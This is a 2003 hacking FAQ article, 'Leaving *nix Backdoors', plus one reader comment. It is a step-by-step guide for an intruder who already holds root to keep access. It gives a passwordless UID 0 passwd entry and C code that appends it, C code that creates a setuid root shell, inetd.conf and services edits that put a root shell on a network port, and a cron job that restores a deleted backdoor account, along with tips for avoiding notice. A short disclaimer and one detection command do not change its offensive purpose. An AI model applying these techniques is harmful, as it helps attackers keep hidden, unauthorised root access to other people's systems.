|
| FAQ Article: Leaving *nix Backdoors |
What is a backdoor? Well, a backdoor is some way into a system other than using the normal procedure (normal procedure could be the login prompt, or an authentication routine). Backdoors can exist for a number of reasons:
- Bad coding - When the program is released, there could be a flaw in it that allows you to bypass the standard authentication procedure and get access. This will be due to the programmers error, or not doing enough security checking on the program :)
- Hackers - If a hacker breaks into a system, they want to leave something on the system to ensure that they can easily get back in again without having to risk hacking the box again. This is when they would create a backdoor in the system, which would allow them to do something special and get round all the standard login processes - and go straight into an admin account.
- Dumb Programmers - For some reason, some makers of software etc. decide that they are going to put their own backdoors into their software. Why? Who knows - power I guess...or so they know that they can get into any computer using their software. Problem is, as soon as real coder takes a look at the program, they see the backdoor and let everyone else in the world know...hence making the program too dangerous for people to use.
There are many different types of backdoor. I don't want to go to in depth into the types, because I think examples will be better. A trojan (discussed in earlier volumes) is a backdoor - programs like Sub Seven or Netbus etc. allow people to get into your box.
However, most backdoors hackers leave will simply involve creating new accounts on the system (with admin privaleges) or turning on a feature of the program/Operating System which allows them to connect to it in a different way. These are the kind of backdoors I want to tackle today.
These will focus on mainly Unix operating systems, simply because Windows backdoors are mostly just what I have said - trojans. Requires no skill (unless you take the time to write your own). So...we will look at the complex world of unix backdoors - and many different techniques of creating backdoors within a system.
** Please Note: I am not encouraging the creation of backdoors - I am simply demonstrating how they can exist - which in turn will help admin's to detect them! **
Backdoor idea 1 - the passwd entry
The first method we will look at is by far the simplest. Ok, you have read the last hack faq volume's topic about CGI exploits. Lets say you choose to use that information on a web site somewhere, and you got the password file from the server.
After a few mins of cracking the password file with JTR (John the ripper, unix password brute forcer) you telnet in to the server and log in as root. Bingo...now, what should you do?
Ideally - don't even log in :) - just inform the system administrator of the bug, and let it be...but, for the purposes of this tutorial - we are going to leave a backdoor so that we can get back in with a bit more stealth some other time.
For the first backdoor, we are just going to add a new account into the system. Ideally, you should add an account with a usename that isn't obvious (basically what I am saying is - don't use the username Haxor, or rooter - or anything similar!).
To add the account, the best way is to add a UID 0 account to the /etc/passwd file. You can do this manualy by opening the file in a unix text editor (such as pico or vi) and adding a line like:
Simon::0:0:Simon Black:/root:/bin/sh
That would add an account with no password and the username "Simon". If you can't be bothered to add it manually in, you can also run a quick c program to do it, like:
#include
main()
{
FILE *fd;
fd=fopen("/etc/passwd","a+");
fprintf(fd,"Simon::0:0:Simon Black:/root:/bin/sh\n");
}
That just automates the procedure, and lets face it - using a program like that you will be in and out a lot quicker. Perhaps for a task that small, you may say a program is not necessary...but for more complex backdoors - you will see that writing a program is often necessary :)
Now, the problem with this backdoor is that it is very obvious. Next time the admin checks the file, a new root account will leap out of the screen at him - and it will be obvious that the server has been hacked. So, lets look at something a little better.
Backdoor idea 2 - setuid/setgid shells
This is a popular one, as it is quick and not too messy...but still not great. The hacker simply makes a copy of /bin/sh (or any shell, could be /bin/bash), sets its ownership to the user or group root, and then sets it setuid or setgid. Then, whenever they run the shell it runs with root privileges.
This program automates the task of making this exploit:
#include
main()
{
system("cp /bin/sh /tmp/out");
system("chown root.root /tmp/out");
system("chmod 4755 /tmp/out");
}
You will notice it places the backdoor in /tmp, which is probably not a great idea - as most system run cronjobs every now and then or reboot to clean out tmp. However, this kind of backdoor can easily be detected by the command:
find / -perm +6000
The output, compared to a previous list of setuid and setgid binaries should show any additions to the system. To avoid this, the hacker can label their setuid shell as a normal (but unused) setuid program such as /sbin/restore.
Backdoor idea 3 - Altering Services
Ok, lets look at something a bit better...remotely accessible backdoor's. The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the appropriate program (usally a server) when a connection request arrives. The format of the /etc/inetd.conf file looks something like this:
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
Here is an explanation of each number:
1. This is the daemon name of the service that appears in /etc/services. This tells inetd what to look for in /etc/services to determine which port it should associate the program name with.
2. This will tell inetd what type of connection to use when the session is establised . TCP uses streams, and UDP(The connectionless protocol) uses datagrams.
3. Protocol field, TCP or UDP.
4. This will tell inetd what the importance of the daemon is. A 'wait' flag indicates that the server will process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a child process to handle the connection, and then go back to sleep, waiting for further connections.
5. This is the user the daemon is run as.
6. Program to run when a connection arrives.
7. This is the actual command (and optional arguments). If the program is trivial (usally requiring no user interaction) inetd may handle it internally. This is done with an 'internal' flag in fields (6) and (7). So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it with something else. You could make it spawn a program that adds a UID 0 acc, or creates a suid shell.
To take over a service like daytime (something which you can usually access by connecting to a server on port 13 - it just tells you the date and time on the server) would be a fun idea :) Imagine - instead of telling you the time - it would send you straight into a root shell! This backdoor could be placed by doing the following to the /etc/inetd.conf:
Find the line that is similar to this:
daytime stream tcp nowait root internal
And change it to:
daytime stream tcp nowait /bin/sh sh -i
Then, before this change becomes active the inetd needs to be restarted...so type:
kill -HUP inetd
Backdoor idea 4 - Your own service :)
This is very similar to last technique, but this describes how you could make your own service...rather than just alter an existing one.
The only real difference is that you need to add a line instead of just altering a line, and also you will need to alter /etc/services as well as /etc/inetd.conf. The format of the /etc/services file is:
(1) (2)/(3) (4)
smtp 25/tcp mail
Here is an explanation of each number:
1. This is the service
2. This is the port number
3. This is the protocol type the service expect
4. This is the common name associated with the service
So, to add a backdoor - the hacker might do something like:
* Add a line to /etc/services:
wang 222/tcp wang
* Add a line to /etc/inetd.conf:
wang stream tcp nowait /bin/sh sh -i
* Restart inetd exactly the same as the last technique.
And bingo :) - telnet to port 222 and you are dropped into a root shell. Notice how the lines added to each file are consistent with each other.
Also - I have an even better example of this for you. Palmito has written a backdoor script specially for this volume. It is written in perl, and you will find it along with this volume in a file called service.pl. The idea would be to put this on the comprimised system, and run it.
This would automate the above technique and create a new backdoor for you (it also does technique 1 for you as well). I recommend you take the time to look at the code and see how it works (or learn perl, and then take a look at the source!).
Backdoor idea 5 - Timed Backdoors
For this backdoor we will look at something the admin has (which, having rooted the box, the hacker now has!) - Crontab. Crontab is used to create schedules, i.e. events which occur at specified intervals or times during the day/month/year. So, this is perfect for a backdoor - image the power the hacker can gain with timed backdoors :)
For example, imagine a situation where a hacker has rooted your Linux system, and placed a backdoor program (say a simple suid shell) and set Crontab to execute it only at midnight, when he knows your not around...powerful!
The root Crontab jobs are located in /var/spool/crontab/root and can be manually edited. The Crontab lines will look something like this:
(1) (2) (3) (4) (5) (6)
0 0 * * 5 /usr/bin/updatedb
Here is an explanation of each number:
1. Minute (0-60)
2. Hour (0-23)
3. Day (1-31)
4. Month (1-12)
5. Day (1-7)
6. This is the what to execute.
So...the example file entry I used above would execute on a Friday. Now use your imagination! You can manually add anything you want into the /var/spool/crontab/root file. For example, I have seen examples where people have added a new account into the /etc/passwd file, and then written a small script which goes through the passwd file to check whether their account is still there (and put it back in if it isn't) - then, they set Crontab to run this program every day.
The result? well...if the admin finds their special backdoor account and removes it...crontab will run their program, which in turn will re-create the account.
Backdoor idea 6 - Re-Exploitation
Most systems have at least a few exploitable holes. If the method the hacker used to get root in the first place is not patched, they may jsut decide to keep on re-exploiting the hole (as opposed to putting a backdoor in). This would be best used on large networks, such as college/universities (which tend to have hundreds and sometimes thousands of poorly maintained UNIX machines on their networks).
Well...there you go :) - a little look into the world of backdoors...something that both hackers and admins need to know about.
|
Posted on: 02-02-2003
Article has been viewed 11747 times
|
| |
| Comments |
|
Comment by OverFIeND - 03-09-2005
This is a brilliant and insightful article, especially for people new and inexperienced with linux (me) well done :)
Post a comment
Please use the form below to post your comments on this article. All comments will be reviewed by the admin before being published publically.
|
| |
|
